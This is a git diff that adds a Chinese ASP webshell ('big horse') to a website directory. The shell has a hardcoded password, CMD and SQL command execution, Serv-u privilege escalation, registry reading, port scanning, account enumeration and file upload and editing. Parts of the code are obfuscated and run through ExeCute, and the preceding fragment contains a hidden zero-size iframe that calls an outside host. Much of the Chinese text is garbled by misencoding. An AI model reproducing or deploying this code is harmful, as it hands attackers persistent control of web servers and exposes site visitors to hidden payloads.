+RRS " �� <a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(Wpath&myfile.name,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a><br>"
+	 Next
+ Set fsubfolers = f.SubFolders
+ For Each f1 in fsubfolers
+	NewPath=Wpath&""&f1.name
+ 	InsertAllFiles NewPath,Wcode,pc
+ Next
+set tfile=nothing
+Set FSO = Nothing
+set tfile=nothing
+set tfile2=nothing
+Set WFSO = Nothing
+End Sub
+  Case "ReadREG":call ReadREG()
+  Case "Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+  Case "DownFile":DownFile FName:ShowErr()
+  Case "DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+  Case "EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+  Case "CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+  Case "MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+  Case "DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+  Case "CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+  Case "MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+  Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+  Case "UpFile":UpFile()
+  Case "Cmd1Shell":Cmd1Shell()
+  case "SetFileText":SetFileText()
+  case "hiddenshell":hiddenshell()
+  case "php":php()
+  case "apjdel":apjdel()
+  Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect URL
+  Case "CreateMdb":CreateMdb FName
+  Case "CompactMdb":CompactMdb FName
+  Case "DbManager":DbManager()
+  Case "Course":Course()
+  Case "ServerInfo":ServerInfo()
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+RRS"</body><iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe></html>"
+%>
\ No newline at end of file
diff --git a/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp b/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp
new file mode 100644
index 0000000..a116b93
--- /dev/null
+++ b/www-7jyewu-cn/牛逼免杀提权隐藏大马 (1).asp	
@@ -0,0 +1,629 @@
+<%
+
+UserPass="admin"'	����
+'------------------------�������ڷǷ�;��----------------------
+mmname="ţ����ɱ��Ȩ���ش���"
+bottomad="����! �ſ��Ƿ�������������!"
+blogurl="http://www.7jyewu.cn/"
+'----------------------һ�к���������޹�----------------------
+color1	="#000000"                                    'color1	="#000000"     
+color2	="#00ff00"                                    'color1	="#00ff00"    
+color3	="#FFFFCC"                                    'color1	="#FFFFCC"    
+color4  ="#fff"                                       'color1	="#fff"    
+color5	="#000000"                                    'color1	="#000000"    
+color6	="#000"                                       'color1	="#000"    
+color7  ="#FFF"                                       'color1	="#FFF"    
+'----------------------ҳ����ɫ�Լ���----------------------������ԭ������ɫ����_�Է����Dz�֪��Ū������
+Server.ScriptTimeout=999999999:Response.Buffer=true:On Error Resume Next
+ExeCute "sub ShowErr():If Err Then:RRS""<br><a href='javascript:history.back()'><br>&nbsp;"" & Err.Description & ""</a><br>"":Err.Clear:Response.Flush:End If:end sub:Sub RRS(str):response.write(str):End Sub:Function RePath(S):RePath=Replace(S,""\"",""\\""):End Function:Function RRePath(S):RRePath=Replace(S,""\\"",""\""):End Function:URL=Request.ServerVariables(""URL""):ServerIP=Request.ServerVariables(""LOCAL_ADDR""):Action=Request(""Action""):Pos=2:RootPath=Server.MapPath("".""):WWWRoot=Server.MapPath(""/""):Serveru=request.servervariables(""http_host"")&url:FolderPath=Request(""FolderPath""):serverp=UserPass:Pn=pos*44:FName=Request(""FName""):pso=5:BackUrl=""<br><br><center><a href='javascript:history.back()'>����</a></center>"""
+
+RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
+RRS"<title>"&mmname&" - "&ServerIP&"</title>"
+RRS"<style type=""text/css"">"
+RRS"body,td{font-size: 12px;background-color:"&color1&";color:"&color2&";}"
+RRS"input,select,textarea{font-size: 12px;background-color:"&color3&";border:1px solid "&color4&"}"
+RRS".C{background-color:"&color5&";border:0px}"
+RRS".cmd{background-color:"&color6&";color:"&color7&"}"
+RRS"body{margin: 0px;margin-left:4px;}"
+RRS"BODY {SCROLLBAR-FACE-COLOR: #000000;SCROLLBAR-HIGHLIGHT-COLOR: #00fcfc;SCROLLBAR-SHADOW-COLOR: #00fcfc;SCROLLBAR-ARROW-COLOR: #00fcfc;SCROLLBAR-TRACK-COLOR: #000000;SCROLLBAR-DARKSHADOW-COLOR: #00fcfc;SCROLLBAR-BASE-COLOR: #000000}"
+RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
+RRS".am{color:#888;font-size:11px;}"
+RRS"</style>"
+ExeCute SinfoEn("lError=kilnerrodow.o;}win trueeturns(){rError killctiont>funscrip=javaguaget lanscripRRS~<rs;~`lse;}rn fa retu;else trueeturn~~))r�˲�����ȷ��Ҫִ��rm(~~confi{if (sok()on yeunctiRRS~f~`();}~ubmitorm.saddrf;top.oldere = F.valurPathFoldeform..addr){topolderder(FowFolon ShunctiRRS~f`~~;}} = ~~valueName.orm.Fhidef{top.}elseit();.submeformp.hidon;toFActiue = n.valActioform..hide){top=nullName!}if(Der~~;~~Othme = e{DNa;}elsDNameue = e.val.FNameformp.hide);to,FNam���ڣ�~~���ļ��Ƿ�ȫ����,עMdb�ļ���Ҫѹ����(~~����rompte = p{DNamdb~~)pactM~~Comion==(FActse ife;}el DNamlue =me.vam.FNadeforop.hime);t~,FNa��ͬ����~��,ע�ⲻb�ļ�ȫ���½���Md~������Ҫmpt(~= proName ~~){DteMdb~Creaon==~FActie if(;}elsDNameue = e.val.FNameformp.hide);to,FNamȫ����~~�����ļ���������Ҫ��pt(~~ promame =~){DNlder~NewFon==~~Actio if(F}elseName;|~~+D~~|||e += .valuFNameform..hide);topFName����~~,���ļ���ȫ���ƶ���Ŀ(~~����rompte = p{DNamer~~)eFold~~Movion==(FActse ife;}el+DNam|||~~= ~~|lue +me.vam.FNadeforop.hime);t~,FNa��ȫ����~��Ŀ���ļ��������ƶ�pt(~~ promame =~){DNlder~opyFo==~~Cctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ�����ƶ���Ŀ(~~����rompte = p{DNamle~~)oveFi==~~Mctionif(FAelse ame;}~~+DN~|||| += ~valueName.orm.Fhidef;top.Name)��~~,F���ļ�ȫ���븴�Ƶ�Ŀ(~~����rompte = p{DNamle~~)opyFi==~~Cctionif(FAName;e = F.valuFNameform..hide){topctionme,FAm(FNallForon FuunctiRRS~f~",Pso)
+RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""�����������ݿ�"");FullDbStr(0);return false;}return true;}":RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDB:Database Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sa;Pwd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&";Port=3306;Database=DbName;Uid=root;Pwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""��ֻ��ʾһ������ʱ������ʾ�ֶε�ȫ���ֽڣ������������Ʋ�ѯʵ��.\n����һ������ֻ��ʾ�ֶε�ǰ��ʮ���ֽڡ�"";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = """";abc.innerHTML=""<center>��ȷ�ϼ��������ݿ�������SQL����������䡣</center>"";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}":RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""�������ݿ����Ӵ��Ƿ���ȷ!"");return false;}if(str.length<10){alert(""����SQL����Ƿ���ȷ!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
+RRS"function gotoURL(targ,selObj,restore){if(selObj.options[selObj.selectedIndex].js==1){eval(selObj.options[selObj.selectedIndex].value);if (restore) selObj.selectedIndex=0}else{eval(targ+"".location='""+selObj.options[selObj.selectedIndex].value+""'"");if (restore) selObj.selectedIndex=0;}}</script>"
+rrs "<body" 
+If Action="" then RRS " scroll=no"
+rrs ">"
+Dim Sot(13,2):Sot(0,0) = "Scripting.FileSystemObject":Sot(0,2) = "�ļ��������":Sot(1,0) = "wscript.shell":Sot(1,2) = "������ִ�����":Sot(2,0) = "ADOX.Catalog":Sot(2,2) = "ACCESS�������":Sot(3,0) = "JRO.JetEngine":Sot(3,2) = "ACCESSѹ�����":Sot(4,0) = "Scripting.Dictionary":Sot(4,2) = "�������ϴ��������":Sot(5,0) = "Adodb.connection":Sot(5,2) = "���ݿ��������":Sot(6,0) = "Adodb.Stream":Sot(6,2) = "�������ϴ����":Sot(7,0) = "SoftArtisans.FileUp":Sot(7,2) = "SA-FileUp �ļ��ϴ����":Sot(8,0) = "LyfUpload.UploadFile":Sot(8,2) = "���Ʒ��ļ��ϴ����":Sot(9,0) = "Persits.Upload.1":Sot(9,2) = "ASPUpload �ļ��ϴ����":Sot(10,0) = "JMail.SmtpMail":Sot(10,2) = "JMail �ʼ��շ����":Sot(11,0) = "CDONTS.NewMail":Sot(11,2) = "����SMTP�������":Sot(12,0) = "SmtpMail.SmtpMail.1":Sot(12,2) = "SmtpMail�������":Sot(13,0) = "Microsoft.XMLHTTP":Sot(13,2) = "���ݴ������"
+For i=0 To 13
+Set T=Server.CreateObject(Sot(i,0))
+If -2147221005 <> Err Then
+IsObj=" ��"
+Else
+IsObj=" ��"
+Err.Clear
+End If
+Set T=Nothing
+Sot(i,1)=IsObj
+Next
+
+
+
+
+If FolderPath<>"" then
+Session("FolderPath")=RRePath(FolderPath)
+End If:If Session("FolderPath")="" Then
+FolderPath=RootPath
+Session("FolderPath")=FolderPath
+End if
+Function MainForm() 
+RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
+RRS"<input type=""hidden"" name=""Action"">"
+RRS"<input type=""hidden"" name=""FName"">"
+RRS"</form>"
+RRS"<table width='100%'>"
+RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+RRS"<tr>����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>����</a>������<a href='javascript:ShowFolder(""c:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\����"")'>����</a>������<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>������<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>������<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>������<a href='javascript:ShowFolder(""c:\\PHP"")'>PHP</a>������<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>������<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>��д</a>��<br>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸��ļ�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����س�������</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+
+
+
+
+
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub:Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:lI="��$S8~++'PEE#'#INDy&$EU,S8<,<8<'S8<,*{)'w**<88������":execute(lIl(lI)):Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
